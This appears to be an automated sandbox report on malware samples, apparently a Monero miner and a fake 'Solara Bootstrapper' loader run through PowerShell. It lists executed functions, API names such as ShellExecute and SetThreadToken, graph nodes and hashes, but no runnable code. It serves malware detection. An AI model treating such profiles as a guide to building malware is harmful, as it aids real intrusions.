                          • Instruction ID: 8afb947d37454b8b2ab3b40e63a62774a69c163e2a8977a6e5dc002fd452a6b4
                          • Opcode Fuzzy Hash: 09aa500106249f898c70f176d5dd8b6a7b84f69ff7d021052aa52de95c06f874
                          • Instruction Fuzzy Hash: FBB01232D0435D84EB092F01D84137836617B0AB44F501030C40C83362CFFF50604B16

                          Executed Functions

                          Function 00007FF68E981140 Relevance: .0, Instructions: 4COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000007.00000002.2205699522.00007FF68E981000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF68E980000, based on PE: true
                          • Associated: 00000007.00000002.2205573967.00007FF68E980000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000007.00000002.2205808717.00007FF68E98B000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000007.00000002.2205938484.00007FF68E98E000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000007.00000002.2205994909.00007FF68E98F000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000007.00000002.2211092211.00007FF68EE83000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000007.00000002.2212296394.00007FF68EEBA000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_7ff68e980000_xmr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 09aa500106249f898c70f176d5dd8b6a7b84f69ff7d021052aa52de95c06f874
                          • Instruction ID: c32c3c2a1b18f9af976fabf33599b37c7fb75d50c30ad0171eb40e0153a193a8
                          • Opcode Fuzzy Hash: 09aa500106249f898c70f176d5dd8b6a7b84f69ff7d021052aa52de95c06f874
                          • Instruction Fuzzy Hash: B0B0926495429DC4EA012F82984126822607F28B40F500024E40C43373EEBD54408B10

                          Execution Graph

                          Execution Coverage:80.5%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:0%
                          Total number of Nodes:28
                          Total number of Limit Nodes:1

                          Callgraph

                          • Executed
                          • Not Executed
                          • Opacity -> Relevance
                          • Disassembly available
                          callgraph 0 Function_00401000 1 Function_00401410 2 Function_004014D1 4 Function_0040145B 2->4 3 Function_004013B4 4->1 4->3 5 Function_0040108C 4->5 5->0

                          Executed Functions

                          Function 004014D1 Relevance: 9.1, APIs: 6, Instructions: 57COMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          Memory Dump Source
                          • Source File: 0000000A.00000002.2096791988.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000A.00000002.2096737642.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000A.00000002.2098346362.0000000000402000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000A.00000002.2098346362.0000000000E02000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000A.00000002.2127722449.0000000000E78000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_400000_Solara Bootstrapper.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled__getmainargs__set_app_type_controlfpexitmemset
                          • String ID:
                          • API String ID: 3649950142-0
                          • Opcode ID: 3df386733fa54401bee5ad451dadeaeca0a1497b38bdaab36b895925076dfb24
                          • Instruction ID: 3d199445f7a175a1fb6d4f6e9c230187ca8284bd5def60f53120883d6dbf2659
                          • Opcode Fuzzy Hash: 3df386733fa54401bee5ad451dadeaeca0a1497b38bdaab36b895925076dfb24
                          • Instruction Fuzzy Hash: 54110CF5E00104AFCB40EBA9EC85F4A77ECAB58308F544479F809F3361E539E9488B65
                          Function 0040108C Relevance: 35.2, APIs: 11, Strings: 9, Instructions: 239filestringCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000A.00000002.2096791988.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000A.00000002.2096737642.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000A.00000002.2098346362.0000000000402000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000A.00000002.2098346362.0000000000E02000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000A.00000002.2127722449.0000000000E78000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_400000_Solara Bootstrapper.jbxd
                          Similarity
                          • API ID: ExecuteShellmemset$fclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
                          • String ID: ! @$%s\%s$& @$1 @$`!@$e!@$p!@$q1$v1
                          • API String ID: 3236948872-410439292
                          • Opcode ID: 25a6402c87674cb448004a13c7e32e17225a32bb4e9f42c6cc14c45e1eeba6cb
                          • Instruction ID: 56ce7a2ae49fa8e5fe1f54009686eb25b361c80b550f3ea0890cdf401772d490
                          • Opcode Fuzzy Hash: 25a6402c87674cb448004a13c7e32e17225a32bb4e9f42c6cc14c45e1eeba6cb
                          • Instruction Fuzzy Hash: 338121F1E001149BDB14DBACDC41B9E77A9EB48309F04057DF109FB392E63CAA448B68
                          Function 00401000 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 50COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 28 401000-40102e malloc 29 401031-401039 28->29 30 401087-40108b 29->30 31 40103f-401085 29->31 31->29
                          APIs
                          Strings
                          • :j60n8x(2vu00d[5(k=x&a--.[.)$<.8, xrefs: 0040106E
                          Memory Dump Source
                          • Source File: 0000000A.00000002.2096791988.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000A.00000002.2096737642.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000A.00000002.2098346362.0000000000402000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000A.00000002.2098346362.0000000000E02000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000A.00000002.2127722449.0000000000E78000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_400000_Solara Bootstrapper.jbxd
                          Similarity
                          • API ID: malloc
                          • String ID: :j60n8x(2vu00d[5(k=x&a--.[.)$<.8
                          • API String ID: 2803490479-829780682
                          • Opcode ID: 6b0f6023af0dde842a795475da203acb5dc2305be251553dc905807124ae4844
                          • Instruction ID: 73f043a98e2a7ee5c63033fe1d48318bea4b72fbf4f694dacf033b8f0cb0a464
                          • Opcode Fuzzy Hash: 6b0f6023af0dde842a795475da203acb5dc2305be251553dc905807124ae4844
                          • Instruction Fuzzy Hash: FA11CCB0E05648EFCB08CFACD5907ADBBF1AF49304F1480AAE856E7391D635AE41DB45
                          Function 0040145B Relevance: 2.5, Strings: 2, Instructions: 30COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 34 40145b-4014ae call 4013b4 call 40108c call 401410
                          Strings
                          Memory Dump Source
                          • Source File: 0000000A.00000002.2096791988.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000A.00000002.2096737642.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000A.00000002.2098346362.0000000000402000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000A.00000002.2098346362.0000000000E02000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000A.00000002.2127722449.0000000000E78000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_400000_Solara Bootstrapper.jbxd
                          Similarity
                          • API ID: memset$ExecuteShellstrcmp
                          • String ID: D`:vD`:v$D`:vD`:v
                          • API String ID: 1389483452-3916433284
                          • Opcode ID: 839a5c45aa83c197ac975d5c1cc53e810cd998e554278d7b16ccc943bd22e27a
                          • Instruction ID: 76b88cef1d86ad1497cb396f4eac675b85de391fd72a1d1e72a6336c0f2a47e6
                          • Opcode Fuzzy Hash: 839a5c45aa83c197ac975d5c1cc53e810cd998e554278d7b16ccc943bd22e27a
                          • Instruction Fuzzy Hash: A7F09EB5A00208AFCB40DFE9D981D8A77F8AB4C308F5044A5F948E7351D634E9488F54

                          Execution Graph

                          Execution Coverage:5.9%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:0%
                          Total number of Nodes:3
                          Total number of Limit Nodes:0
                          execution_graph 21806 8f17160 21807 8f171a3 SetThreadToken 21806->21807 21808 8f171d1 21807->21808

                          Executed Functions

                          Function 04EEB570 Relevance: .3, Instructions: 258COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 626 4eeb570-4eeb599 628 4eeb59e-4eeb8d9 call 4eeab94 626->628 629 4eeb59b 626->629 690 4eeb8de-4eeb8e5 628->690 629->628
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 86663f0cc80d5e1a7eb2800f7a18dfa26065d30b9053b75ba4110fe6ee961be2
                          • Instruction ID: 78dacbfb01348b441c3805d30bf3bc4a92c375dc71538e0eec8220cf7c4425e4
                          • Opcode Fuzzy Hash: 86663f0cc80d5e1a7eb2800f7a18dfa26065d30b9053b75ba4110fe6ee961be2
                          • Instruction Fuzzy Hash: 3591BF70B007059BDB19EFB899115AE7BF3EFC4600B008A2DD106AB368DF75AD058BD5
                          Function 04EEB580 Relevance: .3, Instructions: 252COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 691 4eeb580-4eeb599 692 4eeb59e-4eeb8d9 call 4eeab94 691->692 693 4eeb59b 691->693 754 4eeb8de-4eeb8e5 692->754 693->692
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: aa782611d8ce36b87dbd7bd7a2780c2ffba8f36f2776e0f404052e8f95532082
                          • Instruction ID: 15e67bc761ce0087e605514b159fb36697a99df71294a570aae84f4fd7b49226
                          • Opcode Fuzzy Hash: aa782611d8ce36b87dbd7bd7a2780c2ffba8f36f2776e0f404052e8f95532082
                          • Instruction Fuzzy Hash: 9A917F70B007159BDB19EFB899115AE7BF3EFC4600B008A2DD106AB368DF75AA058BD5
                          Function 07DA2308 Relevance: 13.1, Strings: 10, Instructions: 632COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2237372818.0000000007DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7da0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'jq$4'jq$JPl$JPl$JPl$JPl$JPl$JPl$rOl$rOl
                          • API String ID: 0-3034988559
                          • Opcode ID: a0441e7ee9f190e0a931af9b211df97421fbff7396e41d4ecde7f308b9091d08
                          • Instruction ID: ae8b5b658205cba53c2ad6e591971956c1a4ea556b74584329274d319c9e2ec8
                          • Opcode Fuzzy Hash: a0441e7ee9f190e0a931af9b211df97421fbff7396e41d4ecde7f308b9091d08
                          • Instruction Fuzzy Hash: 1E2246B1B00205EFCB249F6A8940AAAFBE6FFC5311F04847AD945CB251DB35ED45C7A2
                          Function 07DA3CE8 Relevance: 5.6, Strings: 4, Instructions: 585COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 203 7da3ce8-7da3d0d 204 7da3d13-7da3d18 203->204 205 7da3f00-7da3f4a 203->205 206 7da3d1a-7da3d20 204->206 207 7da3d30-7da3d34 204->207 215 7da40ce-7da4112 205->215 216 7da3f50-7da3f55 205->216 211 7da3d22 206->211 212 7da3d24-7da3d2e 206->212 208 7da3d3a-7da3d3c 207->208 209 7da3eb0-7da3eba 207->209 213 7da3d3e-7da3d4a 208->213 214 7da3d4c 208->214 217 7da3ec8-7da3ece 209->217 218 7da3ebc-7da3ec5 209->218 211->207 212->207 219 7da3d4e-7da3d50 213->219 214->219 232 7da4228-7da425d 215->232 233 7da4118-7da411d 215->233 220 7da3f6d-7da3f71 216->220 221 7da3f57-7da3f5d 216->221 222 7da3ed0-7da3ed2 217->222 223 7da3ed4-7da3ee0 217->223 219->209 225 7da3d56-7da3d75 219->225 230 7da4080-7da408a 220->230 231 7da3f77-7da3f79 220->231 226 7da3f5f 221->226 227 7da3f61-7da3f6b 221->227 229 7da3ee2-7da3efd 222->229 223->229 268 7da3d77-7da3d83 225->268 269 7da3d85 225->269 226->220 227->220 235 7da408c-7da4094 230->235 236 7da4097-7da409d 230->236 237 7da3f7b-7da3f87 231->237 238 7da3f89 231->238 256 7da428b-7da4295 232->256 257 7da425f-7da4281 232->257 241 7da411f-7da4125 233->241 242 7da4135-7da4139 233->242 244 7da409f-7da40a1 236->244 245 7da40a3-7da40af 236->245 243 7da3f8b-7da3f8d 237->243 238->243 250 7da4129-7da4133 241->250 251 7da4127 241->251 248 7da41da-7da41e4 242->248 249 7da413f-7da4141 242->249 243->230 252 7da3f93-7da3fb2 243->252 253 7da40b1-7da40cb 244->253 245->253 260 7da41f1-7da41f7 248->260 261 7da41e6-7da41ee 248->261 258 7da4143-7da414f 249->258 259 7da4151 249->259 250->242 251->242 286 7da3fc2 252->286 287 7da3fb4-7da3fc0 252->287 270 7da429f-7da42a5 256->270 271 7da4297-7da429c 256->271 299 7da4283-7da4288 257->299 300 7da42d5-7da42dc 257->300 264 7da4153-7da4155 258->264 259->264 266 7da41f9-7da41fb 260->266 267 7da41fd-7da4209 260->267 264->248 274 7da415b-7da415d 264->274 275 7da420b-7da4225 266->275 267->275 276 7da3d87-7da3d89 268->276 269->276 277 7da42ab-7da42b7 270->277 278 7da42a7-7da42a9 270->278 280 7da415f-7da4165 274->280 281 7da4177-7da417e 274->281 276->209 284 7da3d8f-7da3d96 276->284 285 7da42b9-7da42d2 277->285 278->285 289 7da4169-7da4175 280->289 290 7da4167 280->290 292 7da4180-7da4186 281->292 293 7da4196-7da41d7 281->293 284->205 291 7da3d9c-7da3da1 284->291 298 7da3fc4-7da3fc6 286->298 287->298 289->281 290->281 301 7da3db9-7da3dc8 291->301 302 7da3da3-7da3da9 291->302 303 7da418a-7da4194 292->303 304 7da4188 292->304 298->230 306 7da3fcc-7da4003 298->306 305 7da42de-7da42fe 300->305 301->209 314 7da3dce-7da3dec 301->314 308 7da3dab 302->308 309 7da3dad-7da3db7 302->309 303->293 304->293 321 7da432d-7da434c 305->321 322 7da4300-7da4326 305->322 328 7da401d-7da4024 306->328 329 7da4005-7da400b 306->329 308->301 309->301 314->209 326 7da3df2-7da3e17 314->326 321->305 330 7da434e-7da435c 321->330 322->321 326->209 352 7da3e1d-7da3e24 326->352 331 7da403c-7da407d 328->331 332 7da4026-7da402c 328->332 333 7da400f-7da401b 329->333 334 7da400d 329->334 335 7da435e-7da437b 330->335 336 7da4395-7da439f 330->336 337 7da402e 332->337 338 7da4030-7da403a 332->338 333->328 334->328 350 7da437d-7da438f 335->350 351 7da43e5-7da43ea 335->351 343 7da43a8-7da43ae 336->343 344 7da43a1-7da43a5 336->344 337->331 338->331 348 7da43b0-7da43b2 343->348 349 7da43b4-7da43c0 343->349 353 7da43c2-7da43e2 348->353 349->353 350->336 351->350 354 7da3e6a-7da3e9d 352->354 355 7da3e26-7da3e41 352->355 369 7da3ea4-7da3ead 354->369 362 7da3e5b-7da3e5f 355->362 363 7da3e43-7da3e49 355->363 367 7da3e66-7da3e68 362->367 364 7da3e4b 363->364 365 7da3e4d-7da3e59 363->365 364->362 365->362 367->369
                          Strings
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2237372818.0000000007DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7da0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'jq$4'jq$4'jq$4'jq
                          • API String ID: 0-4000621977
                          • Opcode ID: d7523de967f2752451513afd5383de70bab8938b17da6e13e2173be5784cbf05
                          • Instruction ID: 94862715e89b8bfa3966ab6cb37fc213c573ab09600864680a2aee398dd8d7c7
                          • Opcode Fuzzy Hash: d7523de967f2752451513afd5383de70bab8938b17da6e13e2173be5784cbf05
                          • Instruction Fuzzy Hash: 011266B1B04352EFCB118B6C8911A6AFBA6BFD1320F14847AD945CF291DB71DD42C7A2
                          Function 08F1715A Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 374 8f1715a-8f1719b 375 8f171a3-8f171cf SetThreadToken 374->375 376 8f171d1-8f171d7 375->376 377 8f171d8-8f171f5 375->377 376->377
                          APIs
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2243812301.0000000008F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F10000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_8f10000_powershell.jbxd
                          Similarity
                          • API ID: ThreadToken
                          • String ID:
                          • API String ID: 3254676861-0
                          • Opcode ID: a22a2e879691ae499448eb4285296857897218a03c2178597a7805fb47dc2165
                          • Instruction ID: e9b81800691a758e0651d6aed41050b86e165fb8aafeb16284ac8d77c7174e61
                          • Opcode Fuzzy Hash: a22a2e879691ae499448eb4285296857897218a03c2178597a7805fb47dc2165
                          • Instruction Fuzzy Hash: 581116B59002488FCB10DFAAD584ADEFFF4AF49320F24845AD459B7210C778A945CFA1
                          Function 08F17160 Relevance: 1.5, APIs: 1, Instructions: 48threadCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 380 8f17160-8f171cf SetThreadToken 382 8f171d1-8f171d7 380->382 383 8f171d8-8f171f5 380->383 382->383
                          APIs
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2243812301.0000000008F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F10000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_8f10000_powershell.jbxd
                          Similarity
                          • API ID: ThreadToken
                          • String ID:
                          • API String ID: 3254676861-0
                          • Opcode ID: ec881a95b67e086ffba1010f4d86e3a10b37a4cfc38611a592a0560c42670b33
                          • Instruction ID: 56f6cbc67ffafd5a9c0b7549b45357e77a82a95ae582d108d4592b273e6042b9
                          • Opcode Fuzzy Hash: ec881a95b67e086ffba1010f4d86e3a10b37a4cfc38611a592a0560c42670b33
                          • Instruction Fuzzy Hash: 2C1125B19002488FCB10DF9AD944B9EFBF8EB48320F248459D418A3210C778A944CFA0
                          Function 04EE70A8 Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 386 4ee70a8-4ee70c7 387 4ee71cd-4ee720b 386->387 388 4ee70cd-4ee70d0 386->388 416 4ee70d2 call 4ee775f 388->416 417 4ee70d2 call 4ee7744 388->417 389 4ee70d8-4ee70ea 391 4ee70ec 389->391 392 4ee70f6-4ee710b 389->392 391->392 398 4ee7196-4ee71af 392->398 399 4ee7111-4ee7121 392->399 404 4ee71ba 398->404 405 4ee71b1 398->405 400 4ee712d-4ee7138 399->400 401 4ee7123 399->401 414 4ee713b call 4eec000 400->414 415 4ee713b call 4eec010 400->415 401->400 404->387 405->404 407 4ee7141-4ee7145 408 4ee7147-4ee7157 407->408 409 4ee7185-4ee7190 407->409 410 4ee7159-4ee7171 408->410 411 4ee7173-4ee717d 408->411 409->398 409->399 410->409 411->409 414->407 415->407 416->389 417->389
                          Strings
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: (nq
                          • API String ID: 0-2756854522
                          • Opcode ID: 9010a5b3f2bbba9817fc9f5c8e2db66c7277bf5d3475bd48b95402bbc0896373
                          • Instruction ID: ca72aa85f83481e62feba330bd7bdd0554aedfa80543bfdfbafd620f5002d215
                          • Opcode Fuzzy Hash: 9010a5b3f2bbba9817fc9f5c8e2db66c7277bf5d3475bd48b95402bbc0896373
                          • Instruction Fuzzy Hash: AF413E34B042048FDB18DF69C458AAEBBF1EF8D315F145199D842AB3A5DB35EC01CB61
                          Function 04EEB088 Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 418 4eeb088-4eeb091 call 4eea87c 420 4eeb096-4eeb09a 418->420 421 4eeb09c-4eeb0a9 420->421 422 4eeb0aa-4eeb145 420->422 428 4eeb14e-4eeb16b 422->428 429 4eeb147-4eeb14d 422->429 429->428
                          Strings
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: (&jq
                          • API String ID: 0-3222446104
                          • Opcode ID: 0844a47658e195579f2aac578c29f7999073c95229ed0bad01da0e3cd3ee3801
                          • Instruction ID: eb3a66e86bc96d98ec62d326945eb3c51b5ddbe0ce7d3b344d65596a6227d6e2
                          • Opcode Fuzzy Hash: 0844a47658e195579f2aac578c29f7999073c95229ed0bad01da0e3cd3ee3801
                          • Instruction Fuzzy Hash: 5E21B071A042588FCB14DFAEE444BAEBFF5EB89320F14846ED408E7350CA75A905CBE5
                          Function 04EE7A22 Relevance: 1.3, Strings: 1, Instructions: 56COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 432 4ee7a22-4ee7a28 433 4ee7a2a-4ee7a3d 432->433 434 4ee79c5-4ee79f5 432->434 435 4ee7a3f-4ee7a68 call 4ee6008 433->435 436 4ee7a78-4ee7a80 433->436 444 4ee7a70 435->444 444->436
                          Strings
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: ,(Cl
                          • API String ID: 0-1655630199
                          • Opcode ID: 24dc6a31107ce7c78219a37fca58f4778735af6de5f3e3035481ad8032a0bb97
                          • Instruction ID: 154665231846800b569d0036fb10fee5ce2852f719f4f860cf3efd8d78cef472
                          • Opcode Fuzzy Hash: 24dc6a31107ce7c78219a37fca58f4778735af6de5f3e3035481ad8032a0bb97
                          • Instruction Fuzzy Hash: E411E5347043508FCB159BB9E8949BE7FF5EF8A26471405BDD04ACB362CA769C09C751
                          Function 04EE29F0 Relevance: .2, Instructions: 211COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 755 4ee29f0-4ee2a1e 756 4ee2a24-4ee2a3a 755->756 757 4ee2af5-4ee2b37 755->757 758 4ee2a3f-4ee2a52 756->758 759 4ee2a3c 756->759 761 4ee2b3d-4ee2b56 757->761 762 4ee2c51-4ee2c67 757->762 758->757 766 4ee2a58-4ee2a65 758->766 759->758 764 4ee2b5b-4ee2b69 761->764 765 4ee2b58 761->765 764->762 773 4ee2b6f-4ee2b79 764->773 765->764 768 4ee2a6a-4ee2a7c 766->768 769 4ee2a67 766->769 768->757 774 4ee2a7e-4ee2a88 768->774 769->768 775 4ee2b7b-4ee2b7d 773->775 776 4ee2b87-4ee2b94 773->776 777 4ee2a8a-4ee2a8c 774->777 778 4ee2a96-4ee2aa6 774->778 775->776 776->762 779 4ee2b9a-4ee2baa 776->779 777->778 778->757 780 4ee2aa8-4ee2ab2 778->780 781 4ee2baf-4ee2bbd 779->781 782 4ee2bac 779->782 783 4ee2ab4-4ee2ab6 780->783 784 4ee2ac0-4ee2af4 780->784 781->762 786 4ee2bc3-4ee2bd3 781->786 782->781 783->784 788 4ee2bd8-4ee2be5 786->788 789 4ee2bd5 786->789 788->762 792 4ee2be7-4ee2bf7 788->792 789->788 793 4ee2bfc-4ee2c08 792->793 794 4ee2bf9 792->794 793->762 796 4ee2c0a-4ee2c24 793->796 794->793 797 4ee2c29-4ee2c38 796->797 798 4ee2c26 796->798 800 4ee2c3d-4ee2c50 797->800 798->797
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f773a283227fa6c2d965685a453a18b681d15d4c09d86d9cb3f412a75865f3e6
                          • Instruction ID: cffa427300e7bb8ce1d6f8fc4bd24c12ae988efe1bf1c861b68e68d3930a04d7
                          • Opcode Fuzzy Hash: f773a283227fa6c2d965685a453a18b681d15d4c09d86d9cb3f412a75865f3e6
                          • Instruction Fuzzy Hash: 56919B74A006098FCB05CF59C5849BEFBB6FF48310B248699D959AB3A4C735FC81CB90
                          Function 04EEBBB0 Relevance: .2, Instructions: 155COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 673a7c92f9e963d577a77d8c5d547ce54a9c91f84b77f685892244b03baf5ef8
                          • Instruction ID: 8f1394fc2a7c23009270abd0dfee7a5cbf990d6ad39fe4cc01f0a1be6bb32350
                          • Opcode Fuzzy Hash: 673a7c92f9e963d577a77d8c5d547ce54a9c91f84b77f685892244b03baf5ef8
                          • Instruction Fuzzy Hash: AE61F671E002499FCB14DFAAD584ADDBBF5FF88314F148169E808AB264EB74AC45CB60
                          Function 04EE7808 Relevance: .2, Instructions: 153COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3f6edcbec577df491e7d81e698a02670e143ce403a22f9db4ee07a67124dfa79
                          • Instruction ID: 94fb59458c9ef624b5b29dee36443c127783ed6b2011f888d01c8b81b89fb418
                          • Opcode Fuzzy Hash: 3f6edcbec577df491e7d81e698a02670e143ce403a22f9db4ee07a67124dfa79
                          • Instruction Fuzzy Hash: 28519C347002159FD7149B6AD854A7B77EAFFC8314F148469E50ACB356EB35EC02CBA4
                          Function 04EEBBA0 Relevance: .1, Instructions: 149COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4a12659a031727bb0ac59070701f7d8cb5de2f87954ffb54e1f6e985169a83f6
                          • Instruction ID: 5e3a1fc0e19f70b935cdaafe8c45193fd5a957ce2a8a23b7654314e283ed3460
                          • Opcode Fuzzy Hash: 4a12659a031727bb0ac59070701f7d8cb5de2f87954ffb54e1f6e985169a83f6
                          • Instruction Fuzzy Hash: 20511771E00248DFCB54DFA9D584A9DBBF5FF88314F148069E808AB364EB35A845CB51
                          Function 07DA3CCC Relevance: .1, Instructions: 120COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2237372818.0000000007DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7da0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 41d75c58ce3c99d32c9baf528ceff333f0c46726824cf54ff850978b4f83be92
                          • Instruction ID: 3131bab0ace7f43390d34a65ee47238d115d601538140cc25c36c038fb3ee09b
                          • Opcode Fuzzy Hash: 41d75c58ce3c99d32c9baf528ceff333f0c46726824cf54ff850978b4f83be92
                          • Instruction Fuzzy Hash: BF4116F0A10202EBCB258F28C641E6AFBA3BF91654F1885A5D9009F652D735EE46C7A1
